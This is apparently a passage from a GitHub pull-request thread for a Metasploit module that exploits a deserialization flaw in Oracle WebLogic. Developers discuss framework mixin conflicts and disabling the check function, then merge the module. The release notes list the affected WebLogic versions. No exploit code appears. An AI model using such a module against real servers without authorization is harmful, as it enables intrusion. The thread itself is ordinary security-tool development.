And Rex seems to have really broken things....May just revert and remove check because I don't have a clue why I have to initialize an `RHOST` variable and `RPORT` no longer works.

So I guess I'll just comment out the check code so that if someone else understands this they can try to take it on, but I'm starting to get in over my head in terms of trying to understand why the framework is breaking.

2018-01-18 18:28 UTC, kkirsche commented
Check functionality has been disabled sadly to avoid the conflict and payload updated.

2018-01-18 20:07 UTC, wvu-r7 commented
`primer` is from `TcpServer`, which `HttpServer` mixes in.

2018-01-18 20:09 UTC, wvu-r7 commented
If you can't use `Rex` here, nix the check. :+1:

2018-01-18 20:21 UTC, busterb commented
Sorry to inject, I know there are like 100 comments here, but could we create a new HttpClientServer mixin that doesn't have conflicting methods and datastore options, to replace the existing ones that do? That way we don't break existing modules, but moving forward we can define an API that makes sense. @jmartin-r7 had alluded to something like this last year.

2018-01-18 22:55 UTC, wvu-r7 commented
That would be a great thing for MSF 5. ;)

I think a start is resolving the conflict between mixins for the `SSL` datastore option. That's a big reason `HttpClient` and `HttpServer` haven't merged. It's actually not too much of a stretch to fix it now, but we'd want to do better.

2018-01-19 15:08 UTC, kkirsche commented
I would love to see that, and was what I had started to experiment with when pulling in `Rex`. I had added things like `SSL_CLIENT` to differentiate from the `SSL` of `HttpServer`. But I think it would make sense to do a more complete fix if going to take the time to approach it.

With that said, I think this is ready for a final review unless the team prefers fully removing the check code instead of commenting it out. My hope though is that once it's fixed, either in 4 or 5, that it could be added back in so that users can benefit.

2018-01-23 01:11 UTC, kkirsche commented
Following up if there is anything you need from me on this PR

2018-01-23 22:57 UTC, busterb commented
One final bit I think, could you put your great docs from the PR description in a module doc file and add it to the PR? Then I think it's ready to land.

2018-01-24 19:37 UTC, kkirsche commented
Added @busterb — credit has been given to @asoto-r7 for the original documentation write up

2018-01-25 17:03 UTC, wchen-r7 commented
I agree we should ignore the check feature for now. It seems painful to implement, and the experience should not be that unpleasant for the developer to write.

2018-01-26 03:49 UTC, merged

2018-01-26 03:54 UTC, asoto-r7 commented
# Release Notes

The exploit/multi/http/oracle_weblogic_rce module exploits Linux- and Windows-based Oracle WebLogic servers, with versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.  Powershell and Python payloads have been tested successfully.

Documentation is available: [oracle_weblogic_wsat_deserialization_rce.md](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md)

2018-01-26 13:35 UTC, kkirsche commented
Thanks for all of your help and patience in getting this merged. Really appreciate the help 👍

2018-02-06 23:16 UTC, allrosenthal-r7 commented
Markdown links break when the release notes are pulled in for publication on the help site, so I'm moving @asoto-r7 's documentation link down here: 

Documentation is available: [oracle_weblogic_wsat_deserialization_rce.md](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md)